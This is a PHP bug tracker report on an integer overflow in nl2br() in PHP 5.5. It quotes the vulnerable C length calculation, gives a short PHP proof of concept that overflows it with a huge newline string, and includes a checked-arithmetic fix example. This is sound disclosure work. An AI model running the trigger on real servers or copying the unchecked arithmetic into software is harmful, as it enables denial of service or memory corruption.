PHP :: Sec Bug #72268 :: Integer Overflow in nl2br()
| Sec Bug #72268 | Integer Overflow in nl2br() | | |
|---|---|---|---|
| Submitted: | 2016-05-26 15:53 UTC | Modified: | 2016-07-07 09:34 UTC |
| From: | taoguangchen at icloud dot com | Assigned: | stas (profile) |
| Status: | Closed | Package: | *General Issues |
| PHP Version: | 5.5.36 | OS: | |
| Private report: | No | CVE-ID: | None |
[2016-05-26 15:53 UTC] taoguangchen at icloud dot com
Description:
------------
```c
PHP_FUNCTION(nl2br)
{
    /* in brief this inserts <br /> or <br> before matched regexp \n\r?|\r\n? */
    char *tmp, *str;
    int new_length;
    char *end, *target;
    int repl_cnt = 0;
    int str_len;
    zend_bool is_xhtml = 1;

    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|b", &str, &str_len, &is_xhtml) == FAILURE) {
        return;
    }
    ...
    {
        size_t repl_len = is_xhtml ? (sizeof("<br />") - 1) : (sizeof("<br>") - 1);
        new_length = str_len + repl_cnt * repl_len; // ==> integer overflow
    ...
    RETURN_STRINGL(tmp, new_length, 0);
```
PoC:
```php
<?php
ini_set('memory_limit', -1);
$str = nl2br(str_repeat("\n", 0xffffffff/14+1));
var_dump(strlen($str));
?>
```
Fix:
checking new_length
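The length arithmetic the report points at, as an added example in C (not PHP's own source): the unchecked int expression from the report beside a checked version that refuses any result the int length field cannot hold. The function names, the size_t arithmetic and the shape of the check are assumptions of this example; the input sizes are the report's PoC values.

```c
#include <limits.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Added example, not PHP's code. repl_len is strlen("<br />") or strlen("<br>"),
 * repl_cnt the number of line breaks matched, str_len the input length. */

/* As in the report: the sum lands in an int, so once it exceeds INT_MAX the
 * stored length wraps and the buffer allocated from it is too small for the
 * bytes that are later copied into it. */
int nl2br_len_unchecked(int str_len, int repl_cnt, size_t repl_len)
{
    int new_length = str_len + repl_cnt * repl_len; /* truncated on assignment */
    return new_length;
}

/* Checked version (assumed shape of a fix): do the arithmetic in size_t,
 * detect overflow at each step, and reject results the int field cannot hold. */
bool nl2br_len_checked(size_t str_len, size_t repl_cnt, size_t repl_len, size_t *out)
{
    if (repl_len != 0 && repl_cnt > SIZE_MAX / repl_len)
        return false;                         /* repl_cnt * repl_len would wrap */
    size_t extra = repl_cnt * repl_len;
    if (extra > SIZE_MAX - str_len)
        return false;                         /* str_len + extra would wrap */
    *out = str_len + extra;
    return *out <= (size_t)INT_MAX;           /* must fit the int length field */
}

int main(void)
{
    /* Values from the report's PoC: 0xffffffff/14+1 newlines, each becoming
     * "<br />\n" (6 extra bytes), so the true length is 2147483653 > INT_MAX. */
    size_t n = 0xffffffffu / 14 + 1, out;
    printf("unchecked: %d\n", nl2br_len_unchecked((int)n, (int)n, 6));
    printf("checked: %s\n", nl2br_len_checked(n, n, 6, &out) ? "ok" : "rejected");
    return 0;
}
```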
[2016-06-16 04:53 UTC] stas@php.net
-Assigned To: +Assigned To: stas
[2016-06-21 06:53 UTC] stas@php.net
-Status: Assigned +Status: Closed
[2016-06-21 06:53 UTC] stas@php.net
[2016-07-06 16:03 UTC] php-e1b at deemzed dot uk
[2016-07-07 09:34 UTC] ab@php.net